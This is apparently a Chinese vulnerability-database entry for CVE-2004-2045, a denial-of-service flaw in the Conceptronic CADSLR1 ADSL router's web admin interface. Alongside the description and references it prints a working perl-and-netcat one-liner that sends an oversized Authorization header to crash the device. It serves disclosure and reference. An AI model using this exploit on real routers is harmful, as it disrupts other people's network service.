Conceptronic CADSLR1 ADSL路由器服务拒绝漏洞

Conceptronic CADSLR1 ADSL路由器服务拒绝漏洞

漏洞ID 1108074 漏洞类型 边界条件错误
发布时间 2004-07-22 更新时间 2005-10-20
图片[1]-Conceptronic CADSLR1 ADSL路由器服务拒绝漏洞-安全小百科CVE编号 CVE-2004-2045
图片[2]-Conceptronic CADSLR1 ADSL路由器服务拒绝漏洞-安全小百科CNNVD-ID CNNVD-200412-1198
漏洞平台 Hardware CVSS评分 5.0
|漏洞来源
https://www.exploit-db.com/exploits/363
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200412-1198
|漏洞详情
ConceptronicCADSLR1ADSL路由器运行固件3.04n的HTTP管理接口存在漏洞。远程攻击者借助一个有超长用户名的HTTP请求导致服务拒绝(设备重启)。
|漏洞EXP
$ $victima="ip.victim"
$ perl -e 'print "GET / HTTP/1.1rnHost: '"$victima"'rnAuthorization: 
Basic " . 'A' x 65536 . "rnrn"' | nc -vvn $victima 80 

# milw0rm.com [2004-07-22]
|参考资料

来源:XF
名称:conceptronic-long-username-dos(16746)
链接:http://xforce.iss.net/xforce/xfdb/16746
来源:www.shellsec.net
链接:http://www.shellsec.net/leer_advisory.php?id=5
来源:BID
名称:10769
链接:http://www.securityfocus.com/bid/10769
来源:SECUNIA
名称:12110
链接:http://secunia.com/advisories/12110
来源:BUGTRAQ
名称:20040721DenialofServiceinConceptronicCADSLR1Router
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=109045084522857&w;=2

相关推荐: Cisco Catalyst使能密码旁路漏洞

Cisco Catalyst使能密码旁路漏洞 漏洞ID 1206546 漏洞类型 访问验证错误 发布时间 2000-04-20 更新时间 2005-10-12 CVE编号 CVE-2000-0267 CNNVD-ID CNNVD-200004-054 漏洞平台…

© 版权声明
THE END
喜欢就支持一下吧
点赞0
分享